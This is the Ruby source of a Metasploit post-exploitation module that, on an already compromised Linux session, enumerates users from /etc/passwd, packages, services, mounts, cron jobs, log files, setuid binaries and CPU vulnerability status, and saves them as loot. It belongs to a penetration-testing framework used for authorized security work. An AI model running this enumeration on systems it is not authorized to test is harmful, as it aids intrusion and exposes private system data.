Path: blob/master/modules/post/linux/gather/enum_system.rb
19566 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Linux::System89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Linux Gather System and User Information',14'Description' => %q{15This module gathers system information. We collect16installed packages, installed services, mount information,17user list, user bash history and cron jobs18},19'License' => MSF_LICENSE,20'Author' => [21'Carlos Perez <carlos_perez[at]darkoperator.com>', # get_packages and get_services22'Stephen Haywood <averagesecurityguy[at]gmail.com>', # get_cron and original enum_linux23'sinn3r', # Testing and modification of original enum_linux24'ohdae <bindshell[at]live.com>', # Combined separate mods, modifications and testing25'Roberto Espreto <robertoespreto[at]gmail.com>', # log files and setuid/setgid26],27'Platform' => ['linux'],28'SessionTypes' => ['shell', 'meterpreter'],29'Notes' => {30'Stability' => [CRASH_SAFE],31'SideEffects' => [],32'Reliability' => []33}34)35)36end3738def run39distro = get_sysinfo40store_loot(41'linux.version',42'text/plain',43session,44"Distro: #{distro[:distro]},Version: #{distro[:version]}, Kernel: #{distro[:kernel]}",45'linux_info.txt',46'Linux Version'47)4849# Print the info50print_good('Info:')51print_good("\t#{distro[:version]}")52print_good("\t#{distro[:kernel]}")5354users = execute('/bin/cat /etc/passwd | cut -d : -f 1')55user = execute('/usr/bin/whoami')5657print_good("\tModule running as \"#{user}\" user")5859installed_pkg = get_packages(distro[:distro])60installed_svc = get_services(distro[:distro])6162mount = execute('/bin/mount -l')63crons = get_crons(users, user)64diskspace = execute('/bin/df -ahT')65disks = (mount + "\n\n" + diskspace)66logfiles = execute('find /var/log -type f -perm -4 2> /dev/null')67uidgid = execute('find / -xdev -type f -perm +6000 -perm -1 2> /dev/null || find / -xdev -type f -perm /6000 -perm -1 2> /dev/null')6869save('Linux version', distro)70save('User accounts', users)71save('Installed Packages', installed_pkg)72save('Running Services', installed_svc)73save('Cron jobs', crons)74save('Disk info', disks)75save('Logfiles', logfiles)76save('Setuid/setgid files', uidgid)77save('CPU Vulnerabilities', get_cpu_vulnerabilities)78end7980def save(msg, data, ctype = 'text/plain')81ltype = 'linux.enum.system'82loot = store_loot(ltype, ctype, session, data, nil, msg)83print_status("#{msg} stored in #{loot}")84end8586def execute(cmd)87vprint_status("Execute: #{cmd}")88output = cmd_exec(cmd)89output90end9192def get_packages(distro)93packages_installed = ''94case distro95when /fedora|redhat|suse|mandrake|oracle|amazon/96packages_installed = execute('rpm -qa')97when /slackware/98packages_installed = execute('/bin/ls /var/log/packages')99when /ubuntu|debian/100packages_installed = execute('/usr/bin/dpkg -l')101when /gentoo/102packages_installed = execute('equery list')103when /arch/104packages_installed = execute('/usr/bin/pacman -Q')105else106print_error('Could not determine package manager to get list of installed packages')107end108packages_installed109end110111def get_services(distro)112services_installed = ''113case distro114when /fedora|redhat|suse|mandrake|oracle|amazon/115services_installed = execute('/sbin/chkconfig --list')116when /slackware/117services_installed << "\nEnabled:\n*************************\n"118services_installed << execute("ls -F /etc/rc.d | /bin/grep \'*$\'")119services_installed << "\n\nDisabled:\n*************************\n"120services_installed << execute("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'")121when /ubuntu|debian/122services_installed = execute('/usr/sbin/service --status-all')123when /gentoo/124services_installed = execute('/bin/rc-status --all')125when /arch/126services_installed = execute("/bin/egrep '^DAEMONS' /etc/rc.conf")127else128print_error('Could not determine the Linux Distribution to get list of configured services')129end130services_installed131end132133def get_cpu_vulnerabilities134execute('grep -r . /sys/devices/system/cpu/vulnerabilities').to_s135end136137def get_crons(users, user)138if user == 'root' && users139users = users.chomp.split140users.each do |u|141next unless u == 'root'142143vprint_status('Enumerating as root')144cron_data = ''145users.each do |usr|146cron_data << "*****Listing cron jobs for #{usr}*****\n"147cron_data << execute("crontab -u #{usr} -l") + "\n\n"148end149end150else151vprint_status("Enumerating as #{user}")152cron_data = "***** Listing cron jobs for #{user} *****\n\n"153cron_data << execute('crontab -l')154155# Save cron data to loot156cron_data157end158end159end160161162